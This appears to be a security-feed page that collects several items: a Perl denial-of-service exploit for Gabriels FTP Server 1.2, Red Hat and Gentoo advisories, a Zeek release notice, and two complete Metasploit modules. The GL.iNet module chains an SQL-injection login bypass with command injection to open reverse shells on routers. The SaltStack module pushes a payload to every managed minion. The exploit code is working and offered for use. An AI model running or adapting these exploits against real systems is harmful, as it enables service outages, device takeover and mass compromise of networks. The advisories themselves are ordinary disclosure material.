Gabriels FTP Server version 1.2 remote denial of service exploit.

#!/usr/bin/perl

use IO::Socket::INET;

# Exploit Title: Gabriels FTP Server 1.2 - Denial of Service (DoS)  
# Discovery by: Fernando Mengali  
# Discovery Date: 25 january 2024  
# Vendor Homepage:  N/A  
# Download to demo: https://drive.google.com/file/d/1k8QxfP6x908E-1QpRAVulKoAM9OEo1a8/view?usp=sharing  
# Notification vendor: No reported  
# Tested Version: Gabriels FTP Server 1.2  
# Tested on: Window XP Professional - Service Pack 2 and 3 - English  
# Vulnerability Type: Denial of Service (DoS)  
# Vídeo: https://www.youtube.com/watch?v=wwHuXfYS8yQ

#1. Description

#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).  
#For this exploit I have tried several strategies to increase reliability and performance:  
#Jump to a static 'call esp'  
#Backwards jump to code a known distance from the stack pointer.  
#The server does not correctly handle the amount of data or bytes of the USERNAME entered by the user.  
#When authenticating to the FTP server with a long USERNAME or a USERNAME with a large number of characters for the server to process, the server will crash as soon as it is received and processed, causing denial of service conditions.  
#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.

#2. Proof of Concept - PoC

    $sis="$^O";

    if ($sis eq "windows"){  
      $cmd="cls";  
    } else {  
      $cmd="clear";  
    }

    system("$cmd");

        intro();  
    main();

        print "[+] Exploiting... \n";

    my $payload = "\x41\x2C\x41\x20\x42"x500;

    my $ftp_socket = IO::Socket::INET->new(  
        PeerAddr => $ip,  
        PeerPort => $port,  
        Proto    => 'tcp',  
        Timeout => '10',  
    ) or die "Não foi possível se conectar ao servidor.";

    my $response = <$ftp_socket>;

    print $ftp_socket "USER $payload\r\n";

    print "[+] Done - Exploited success!!!!!\n\n";

     sub intro {  
      print "######################################################################\n";  
      print "#                Gabriels FTP Server 1.2 - Denied of Service         #\n";  
      print "#                                                                    #\n";  
      print "#                       Coded by Fernando Mengali                    #\n";  
      print "#                                                                    #\n";  
      print "#                 e-mail: fernando.mengalli\@gmail.com               #\n";  
      print "#                                                                    #\n";  
      print "######################################################################\n";  
  }

  sub main {

our ($ip, $port) = @ARGV;

      unless (defined($ip) && defined($port)) {

        print "       \nUsage: $0 <ip> <port>                 \n";  
        exit(-1);

      }  
  }

#3. Solution/ How to fix:

# This version product is deprecated

Gabriels FTP Server 1.2 Denial Of Service

Red Hat Security Advisory 2024-0399-03 - An update for gnutls is now available for Red Hat Enterprise Linux 8.8 Extended Update Support.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0399.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: gnutls security updateAdvisory ID:        RHSA-2024:0399-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:0399Issue date:         2024-01-24Revision:           03CVE Names:          CVE-2023-5981====================================================================Summary: An update for gnutls is now available for Red Hat Enterprise Linux 8.8 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The gnutls packages provide the GNU Transport Layer Security (GnuTLS) library, which implements cryptographic algorithms and protocols such as SSL, TLS, and DTLS.Security Fix(es):* gnutls: timing side-channel in the RSA-PSK authentication (CVE-2023-5981)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-5981References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2248445

Red Hat Security Advisory 2024-0399-03

Red Hat Security Advisory 2024-0397-03 - An update for the squid:4 module is now available for Red Hat Enterprise Linux 8.8 Extended Update Support. Issues addressed include buffer over-read, denial of service, and null pointer vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0397.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: squid:4 security update  
Advisory ID:        RHSA-2024:0397-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:0397  
Issue date:         2024-01-24  
Revision:           03  
CVE Names:          CVE-2023-5824  
====================================================================

Summary: 

An update for the squid:4 module is now available for Red Hat Enterprise Linux 8.8 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Squid is a high-performance proxy caching server for web clients, supporting FTP, and HTTP data objects.

Security Fix(es):

* squid: DoS against HTTP and HTTPS (CVE-2023-5824)

* squid: Denial of Service in SSL Certificate validation (CVE-2023-46724)

* squid: NULL pointer dereference in the gopher protocol code (CVE-2023-46728)

* squid: Buffer over-read in the HTTP Message processing feature (CVE-2023-49285)

* squid: Incorrect Check of Function Return Value In Helper Process management (CVE-2023-49286)

* squid: denial of service in HTTP request parsing (CVE-2023-50269)

Bug Fix(es):

* squid crashes in assertion when a parent peer exists (JIRA:RHEL-18256)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2023-5824

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2245914  
https://bugzilla.redhat.com/show_bug.cgi?id=2247567  
https://bugzilla.redhat.com/show_bug.cgi?id=2248521  
https://bugzilla.redhat.com/show_bug.cgi?id=2252923  
https://bugzilla.redhat.com/show_bug.cgi?id=2252926  
https://bugzilla.redhat.com/show_bug.cgi?id=2254663

Red Hat Security Advisory 2024-0397-03

Red Hat Security Advisory 2024-0387-03 - An update for the php:8.1 module is now available for Red Hat Enterprise Linux 9. Issues addressed include a denial of service vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0387.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: php:8.1 security update  
Advisory ID:        RHSA-2024:0387-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:0387  
Issue date:         2024-01-24  
Revision:           03  
CVE Names:          CVE-2023-0567  
====================================================================

Summary: 

An update for the php:8.1 module is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

PHP is an HTML-embedded scripting language commonly used with the Apache HTTP Server.

Security Fix(es):

* php: 1-byte array overrun in common path resolve code (CVE-2023-0568)

* php: DoS vulnerability when parsing multipart request body (CVE-2023-0662)

* php: Missing error check and insufficient random bytes in HTTP Digest authentication for SOAP (CVE-2023-3247)

* php: XML loading external entity without being enabled (CVE-2023-3823)

* php: phar Buffer mismanagement (CVE-2023-3824)

* php: Password_verify() always return true with some hash (CVE-2023-0567)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2023-0567

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://bugzilla.redhat.com/show_bug.cgi?id=2170761  
https://bugzilla.redhat.com/show_bug.cgi?id=2170770  
https://bugzilla.redhat.com/show_bug.cgi?id=2170771  
https://bugzilla.redhat.com/show_bug.cgi?id=2219290  
https://bugzilla.redhat.com/show_bug.cgi?id=2229396  
https://bugzilla.redhat.com/show_bug.cgi?id=2230101

Red Hat Security Advisory 2024-0387-03

Red Hat Security Advisory 2024-0386-03 - An update for kpatch-patch is now available for Red Hat Enterprise Linux 9.0 Extended Update Support. Issues addressed include a use-after-free vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0386.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: kpatch-patch security updateAdvisory ID:        RHSA-2024:0386-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:0386Issue date:         2024-01-24Revision:           03CVE Names:          CVE-2023-4623====================================================================Summary: An update for kpatch-patch is now available for Red Hat Enterprise Linux 9.0 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:This is a kernel live patch module which is automatically loaded by the RPM post-install script to modify the code of a running kernel.Security Fix(es):* kernel: net/sched: sch_hfsc UAF (CVE-2023-4623)* kernel: use after free in nvmet_tcp_free_crypto in NVMe (CVE-2023-5178)* kernel: IGB driver inadequate buffer size for frames larger than MTU (CVE-2023-45871)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-4623References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2237757https://bugzilla.redhat.com/show_bug.cgi?id=2241924https://bugzilla.redhat.com/show_bug.cgi?id=2244723

Red Hat Security Advisory 2024-0386-03

Zeek is a powerful network analysis framework that is much different from the typical IDS you may know. While focusing on network security monitoring, Zeek provides a comprehensive platform for more general network traffic analysis as well. Well grounded in more than 15 years of research, Zeek has successfully bridged the traditional gap between academia and operations since its inception. Today, it is relied upon operationally in particular by many scientific environments for securing their cyber-infrastructure. Zeek's user community includes major universities, research labs, supercomputing centers, and open-science communities. This is the source code release.

Zeek 6.0.3

A command injection vulnerability exists in multiple GL.iNet network products, allowing an attacker to inject and execute arbitrary shell commands via JSON parameters at the gl_system_log and gl_crash_log interface in the logread module. This Metasploit exploit requires post-authentication using the Admin-Token cookie/sessionID (SID), typically stolen by the attacker. However, by chaining this exploit with vulnerability CVE-2023-50919, one can bypass the Nginx authentication through a Lua string pattern matching and SQL injection vulnerability. The Admin-Token cookie/SID can be retrieved without knowing a valid username and password. Many products are vulnerable.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##require 'digest/md5'class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'GL.iNet Unauthenticated Remote Command Execution via the logread module.',        'Description' => %q{          A command injection vulnerability exists in multiple GL.iNet network products, allowing an attacker          to inject and execute arbitrary shell commands via JSON parameters at the `gl_system_log` and `gl_crash_log`          interface in the `logread` module.          This exploit requires post-authentication using the `Admin-Token` cookie/sessionID (`SID`), typically stolen          by the attacker.          However, by chaining this exploit with vulnerability CVE-2023-50919, one can bypass the Nginx authentication          through a `Lua` string pattern matching and SQL injection vulnerability. The `Admin-Token` cookie/`SID` can be          retrieved without knowing a valid username and password.          The following GL.iNet network products are vulnerable:          - A1300, AX1800, AXT1800, MT3000, MT2500/MT2500A: v4.0.0 < v4.5.0;          - MT6000: v4.5.0 - v4.5.3;          - MT1300, MT300N-V2, AR750S, AR750, AR300M, AP1300, B1300: v4.3.7;          - E750/E750V2, MV1000: v4.3.8;          - X3000: v4.0.0 - v4.4.2;          - XE3000: v4.0.0 - v4.4.3;          - SFT1200: v4.3.6;          - and potentially others (just try ;-)          NOTE: Staged Meterpreter payloads might core dump on the target, so use stage-less Meterpreter payloads          when using the Linux Dropper target.        },        'License' => MSF_LICENSE,        'Author' => [          'h00die-gr3y <h00die.gr3y[at]gmail.com>', # MSF module contributor          'Unknown', # Discovery of the vulnerability CVE-2023-50445          'DZONERZY' # Discovery of the vulnerability CVE-2023-50919        ],        'References' => [          ['CVE', '2023-50445'],          ['CVE', '2023-50919'],          ['URL', 'https://attackerkb.com/topics/3LmJ0d7rzC/cve-2023-50445'],          ['URL', 'https://attackerkb.com/topics/LdqSuqHKOj/cve-2023-50919'],          ['URL', 'https://libdzonerzy.so/articles/from-zero-to-botnet-glinet.html'],          ['URL', 'https://github.com/gl-inet/CVE-issues/blob/main/4.0.0/Using%20Shell%20Metacharacter%20Injection%20via%20API.md']        ],        'DisclosureDate' => '2023-12-10',        'Platform' => ['unix', 'linux'],        'Arch' => [ARCH_CMD, ARCH_MIPSLE, ARCH_MIPSBE, ARCH_ARMLE, ARCH_AARCH64],        'Privileged' => true,        'Targets' => [          [            'Unix Command',            {              'Platform' => 'unix',              'Arch' => ARCH_CMD,              'Type' => :unix_cmd,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/unix/reverse_netcat'              }            }          ],          [            'Linux Dropper',            {              'Platform' => 'linux',              'Arch' => [ARCH_MIPSLE, ARCH_MIPSBE, ARCH_ARMLE, ARCH_AARCH64],              'Type' => :linux_dropper,              'CmdStagerFlavor' => ['curl', 'wget', 'echo', 'printf', 'bourne'],              'Linemax' => 900,              'DefaultOptions' => {                'PAYLOAD' => 'linux/mipsbe/meterpreter_reverse_tcp'              }            }          ]        ],        'DefaultTarget' => 0,        'DefaultOptions' => {          'RPORT' => 443,          'SSL' => true        },        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]        }      )    )    register_options([      OptString.new('SID', [false, 'Session ID'])    ])  end  def vuln_version?    @glinet = { 'model' => nil, 'firmware' => nil, 'arch' => nil }    # check first with version 4.x api call    post_data = {      jsonrpc: '2.0',      id: rand(1000..9999),      method: 'call',      params: [        '',        'ui',        'check_initialized',        {}      ]    }.to_json    res = send_request_cgi({      'method' => 'POST',      'ctype' => 'text/json',      'uri' => normalize_uri(target_uri.path, 'rpc'),      'data' => post_data.to_s    })    if res && res.code == 200 && res.body.include?('result')      res_json = res.get_json_document      unless res_json.blank?        @glinet['model'] = res_json['result']['model']        @glinet['firmware'] = res_json['result']['firmware_version']      end    else      # check with version 3.x api call. These versions are NOT vulnerable      res = send_request_cgi({        'method' => 'GET',        'ctype' => 'application/x-www-form-urlencoded',        'uri' => normalize_uri(target_uri.path, 'cgi-bin', 'api', 'router', 'hello')      })      if res && res.code == 200 && res.body.include?('model') && res.body.include?('version')        res_json = res.get_json_document        unless res_json.blank?          @glinet['model'] = res_json['model']          @glinet['firmware'] = res_json['version']        end      end    end    # check for the vulnerable models and firmware versions    case @glinet['model']    when 'sft1200'      @glinet['arch'] = 'mipsle'      return Rex::Version.new(@glinet['firmware']) == Rex::Version.new('4.3.6')    when 'ar750', 'ar750s', 'ar300m', 'ar300m16'      @glinet['arch'] = 'mipsbe'      return Rex::Version.new(@glinet['firmware']) == Rex::Version.new('4.3.7')    when 'mt300n-v2', 'mt1300'      @glinet['arch'] = 'mipsle'      return Rex::Version.new(@glinet['firmware']) == Rex::Version.new('4.3.7')    when 'ap1300', 'b1300'      @glinet['arch'] = 'armle'      return Rex::Version.new(@glinet['firmware']) == Rex::Version.new('4.3.7')    when 'e750', 'e750v2'      @glinet['arch'] = 'mipsbe'      return Rex::Version.new(@glinet['firmware']) == Rex::Version.new('4.3.8')    when 'mv1000'      @glinet['arch'] = 'armle'      return Rex::Version.new(@glinet['firmware']) == Rex::Version.new('4.3.8')    when 'ax1800', 'axt1800', 'a1300'      @glinet['arch'] = 'armle'      return Rex::Version.new(@glinet['firmware']) >= Rex::Version.new('4.0.0') && Rex::Version.new(@glinet['firmware']) < Rex::Version.new('4.5.0')    when 'mt2500', 'mt2500a', 'mt3000'      @glinet['arch'] = 'aarch64'      return Rex::Version.new(@glinet['firmware']) >= Rex::Version.new('4.0.0') && Rex::Version.new(@glinet['firmware']) < Rex::Version.new('4.5.0')    when 'mt6000'      @glinet['arch'] = 'aarch64'      return Rex::Version.new(@glinet['firmware']) >= Rex::Version.new('4.5.0') && Rex::Version.new(@glinet['firmware']) <= Rex::Version.new('4.5.3')    when 'x3000'      @glinet['arch'] = 'aarch64'      return Rex::Version.new(@glinet['firmware']) >= Rex::Version.new('4.0.0') && Rex::Version.new(@glinet['firmware']) <= Rex::Version.new('4.4.2')    when 'xe3000'      @glinet['arch'] = 'aarch64'      return Rex::Version.new(@glinet['firmware']) >= Rex::Version.new('4.0.0') && Rex::Version.new(@glinet['firmware']) <= Rex::Version.new('4.4.3')    end    @glinet['arch'] = 'n/a'    return false  end  def auth_bypass    # Check if datastore['SID'] is set    return datastore['SID'] unless datastore['SID'].blank?    # Exploit CVE-2023-50919 to retrieve the SID without valid username and password.    # Send an RPC request calling the challenge method, which will return a random nonce,    # the selected root user’s salt, and the crypt’s algorithm to hash the password.    post_data = {      jsonrpc: '2.0',      id: rand(1000..9999),      method: 'challenge',      params: {        username: 'root'      }    }.to_json    res = send_request_cgi({      'method' => 'POST',      'ctype' => 'text/json',      'uri' => normalize_uri(target_uri.path, 'rpc'),      'data' => post_data.to_s    })    if res && res.code == 200 && res.body.include?('nonce')      res_json = res.get_json_document      unless res_json.blank?        nonce = res_json['result']['nonce']      end    else      fail_with(Failure::NotFound, 'Getting the random nonce failed.')    end    # Perform REGEX to lookup uid field from /etc/shadow to be used as password with manipulated root username    # Use the SQL injection part to lookup the ACLs for root stored in sqlite db    # Create the password hash which is the md5 of the concatenation of the user, password, and the retrieved nonce    username = "roo[^'union selecT char(114,111,111,116)--]:[^:]+:[^:]+"    pw = '0'    hash = Digest::MD5.hexdigest("#{username}:#{pw}:#{nonce}")    # Login with the password hash and obtain the SessionID (SID)    post_data = {      jsonrpc: '2.0',      id: rand(1000..9999),      method: 'login',      params: {        username: username.to_s,        hash: hash.to_s      }    }.to_json    res = send_request_cgi({      'method' => 'POST',      'ctype' => 'text/json',      'uri' => normalize_uri(target_uri.path, 'rpc'),      'data' => post_data.to_s    })    if res && res.code == 200 && res.body.include?('sid')      res_json = res.get_json_document      unless res_json.blank?        sid = res_json['result']['sid']      end    else      fail_with(Failure::NotFound, 'Retrieving the SessionID (SID) failed.')    end    return sid  end  def execute_command(cmd, _opts = {})    payload = Base64.strict_encode64(cmd)    cmd = "echo #{payload}|openssl enc -base64 -d -A|sh"    post_data = {      jsonrpc: '2.0',      id: rand(1000..9999),      method: 'call',      params: [        @sid.to_s,        'logread',        'get_system_log',        {          lines: '',          module: "|#{cmd}"        }      ]    }.to_json    return send_request_cgi({      'method' => 'POST',      'ctype' => 'text/json',      'cookie' => "Admin-Token=#{@sid}",      'uri' => normalize_uri(target_uri.path, 'rpc'),      'data' => post_data.to_s    })  end  def check    print_status("Checking if #{peer} can be exploited.")    # Check if target is a GL.iNet network device and the firmware version is vulnerable    return CheckCode::Vulnerable("Product info: #{@glinet['model']}|#{@glinet['firmware']}|#{@glinet['arch']}") if vuln_version?    unless @glinet['firmware'].nil?      # GL.iNet network devices with firmware version 3.x that are safe from this exploit      return CheckCode::Safe("Product info: #{@glinet['model']}|#{@glinet['firmware']}|#{@glinet['arch']}") if Rex::Version.new(@glinet['firmware']) < Rex::Version.new('4.0.0')      # GL.iNet network devices with a firmware version 4.x or higher which still could be vulnerable unless the architecture is not available (n/a)      if @glinet['arch'] != 'n/a' && (Rex::Version.new(@glinet['firmware']) >= Rex::Version.new('4.0.0'))        return CheckCode::Safe("Product info: #{@glinet['model']}|#{@glinet['firmware']}|#{@glinet['arch']}")      end      return CheckCode::Detected("Product info: #{@glinet['model']}|#{@glinet['firmware']}|#{@glinet['arch']}") if Rex::Version.new(@glinet['firmware']) >= Rex::Version.new('4.0.0')    end    # No GL.iNet network device or not reachable    CheckCode::Unknown('No GL.iNet network device or device is not responding.')  end  def exploit    @sid = auth_bypass    print_status("SID: #{@sid}")    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")    case target['Type']    when :unix_cmd      execute_command(payload.encoded)    when :linux_dropper      # Don't check the response here since the server won't respond      # if the payload is successfully executed.      execute_cmdstager({ linemax: target.opts['Linemax'] })    end  endend

GL.iNet Unauthenticated Remote Command Execution

This Metasploit exploit module uses saltstack salt to deploy a payload and run it on all targets which have been selected (default all). Currently only works against nix targets.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Local  Rank = GoodRanking  include Msf::Post::File  include Msf::Exploit::EXE  include Msf::Exploit::FileDropper  include Msf::Exploit::Local::Saltstack  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Saltstack Minion Payload Deployer',        'Description' => %q{          This exploit module uses saltstack salt to deploy a payload and run it          on all targets which have been selected (default all).          Currently only works against nix targets.        },        'License' => MSF_LICENSE,        'Author' => [          'h00die', # msf module          'c2Vlcgo'        ],        'Platform' => [ 'linux', 'unix' ],        'Stance' => Msf::Exploit::Stance::Passive,        'Arch' => [ ARCH_X86, ARCH_X64 ],        'SessionTypes' => [ 'shell', 'meterpreter' ],        'Targets' => [[ 'Auto', {} ]],        'Privileged' => true,        'References' => [],        'DisclosureDate' => '2011-03-19', # saltstack salt original release date        'DefaultTarget' => 0,        'Passive' => true, # this allows us to get multiple shells calling home        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [CONFIG_CHANGES, ARTIFACTS_ON_DISK]        }      )    )    register_options [      OptString.new('SALT', [true, 'salt-master executable location', '']),      OptString.new('MINIONS', [true, 'Minions Target', '*']),      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),      OptString.new('TargetWritableDir', [ true, 'A directory where we can write and execute files on targets', '/tmp' ]),      OptBool.new('CALCULATE', [ true, 'Calculate how many boxes will be attempted', true ]),      OptInt.new('ListenerTimeout', [ false, 'The maximum number of seconds to wait for new sessions', 60 ]),      OptInt.new('TIMEOUT', [true, 'Timeout for salt commands to run in seconds', 120])    ]  end  def salt_master    return @salt if @salt    [datastore['SALT'], '/usr/bin/salt-master', '/usr/local/bin/salt-master'].each do |exec|      next unless executable?(exec)      @salt = exec      return @salt    end    @salt  end  def list_minions_printer    minions = list_minions    return if minions.nil?    tbl = Rex::Text::Table.new(      'Header' => 'Minions List',      'Indent' => 1,      'Columns' => ['Status', 'Minion Name']    )    count = 0    minions['minions'].each do |minion|      tbl << ['Accepted', minion]      count += 1    end    print_good(tbl.to_s)    # https://github.com/rapid7/metasploit-framework/pull/18626#discussion_r1434577017    print_good("#{count} minions were found in the accepted state, and will attempt to execute payload. If this isn't an expected volume (too many), ctr+c to halt execution. Pausing 10 seconds.")    Rex.sleep(10)    count  end  def check    return CheckCode::Safe('salt-master does not seem to be installed, unable to find salt-master executable') if salt_master.nil?    CheckCode::Vulnerable('salt-master executable found')  end  def exploit    # Make sure we can write our exploit and payload to the local system    fail_with Failure::BadConfig, "#{datastore['WritableDir']} is not writable" unless writable? datastore['WritableDir']    count = 1 # default to running if we decide not to calculate    count = list_minions_printer if datastore['CALCULATE']    fail_with Failure::NotFound, 'No exploitable minions found.' if count == 0    payload_name = rand_text_alphanumeric(5..10)    # due to a bug in older (2021) versions of salt-cp, we need to write ascii files. https://github.com/saltstack/salt/issues/59899    upload_and_chmodx "#{datastore['WritableDir']}/#{payload_name}", Rex::Text.encode_base64(generate_payload_exe)    print_status('Copying payload to minions')    cmd_exec("salt-cp '#{datastore['MINIONS']}' '#{datastore['WritableDir']}/#{payload_name}' '#{datastore['TargetWritableDir']}/#{payload_name}.b64'")    print_status('Executing payloads')    cmd_exec("salt '#{datastore['MINIONS']}' cmd.run 'base64 -d #{datastore['TargetWritableDir']}/#{payload_name}.b64 > #{datastore['TargetWritableDir']}/#{payload_name} && chmod 755 #{datastore['TargetWritableDir']}/#{payload_name} && #{datastore['TargetWritableDir']}/#{payload_name}'")    # stolen from exploit/multi/handler    stime = Time.now.to_f    timeout = datastore['ListenerTimeout'].to_i    loop do      break if timeout > 0 && (stime + timeout < Time.now.to_f)      Rex::ThreadSafe.sleep(1)    end  end  def on_new_session(_session)    super    cli.core.use('stdapi') if !cli.ext.aliases.include?('stdapi')    begin      print_warning("Deleting: #{datastore['TargetWritableDir']}/#{payload_name}")      cli.fs.file.rm("#{datastore['TargetWritableDir']}/#{payload_name}")      print_good("#{datastore['TargetWritableDir']}/#{payload_name} removed")    rescue StandardError      print_error("Unable to delete: #{datastore['TargetWritableDir']}/#{payload_name}")    end  endend

Saltstack Minion Payload Deployer

Gentoo Linux Security Advisory 202401-29 - A vulnerability has been discovered in sudo which can lead to execution manipulation through rowhammer-style memory manipulation. Versions less than 1.9.15_p2 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202401-29  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: sudo: Memory Manipulation  
     Date: January 24, 2024  
     Bugs: #920510  
       ID: 202401-29

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A vulnerability has been discovered in sudo which can lead to execution  
manipulation through rowhammer-style memory manipulation.

Background  
==========

sudo allows a system administrator to give users the ability to run  
commands as other users.

Affected packages  
=================

Package         Vulnerable    Unaffected  
--------------  ------------  ------------  
app-admin/sudo  < 1.9.15_p2   >= 1.9.15_p2

Description  
===========

Multiple vulnerabilities have been discovered in sudo. Please review the  
CVE identifiers referenced below for details.

Impact  
======

Stack/register variables can be flipped via fault injection, affecting  
execution flow in security-sensitive code.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All sudo users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=app-admin/sudo-1.9.15_p2"

References  
==========

[ 1 ] CVE-2023-42465  
      https://nvd.nist.gov/vuln/detail/CVE-2023-42465

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202401-29

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202401-29

Gentoo Linux Security Advisory 202401-28 - Multiple vulnerabilities have been discovered in GOCR, the worst of which could lead to arbitrary code execution. Versions below or equal to 0.52-r1 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202401-28  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: GOCR: Multiple Vulnerabilities  
     Date: January 24, 2024  
     Bugs: #824290  
       ID: 202401-28

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in GOCR, the worst of  
which could lead to arbitrary code execution.

Background  
==========

GOCR is an OCR (Optical Character Recognition) program, developed under  
the GNU Public License. It converts scanned images of text back to text  
files.

Affected packages  
=================

Package        Vulnerable    Unaffected  
-------------  ------------  ------------  
app-text/gocr  <= 0.52-r1    Vulnerable!

Description  
===========

Multiple vulnerabilities have been discovered in GOCR. Please review the  
CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

Gentoo has discontinued support for GOCR. We recommend that users  
unmerge it:

  # emerge --ask --depclean "app-text/gocr"

References  
==========

[ 1 ] CVE-2021-33479  
      https://nvd.nist.gov/vuln/detail/CVE-2021-33479  
[ 2 ] CVE-2021-33480  
      https://nvd.nist.gov/vuln/detail/CVE-2021-33480  
[ 3 ] CVE-2021-33481  
      https://nvd.nist.gov/vuln/detail/CVE-2021-33481

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202401-28

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Source

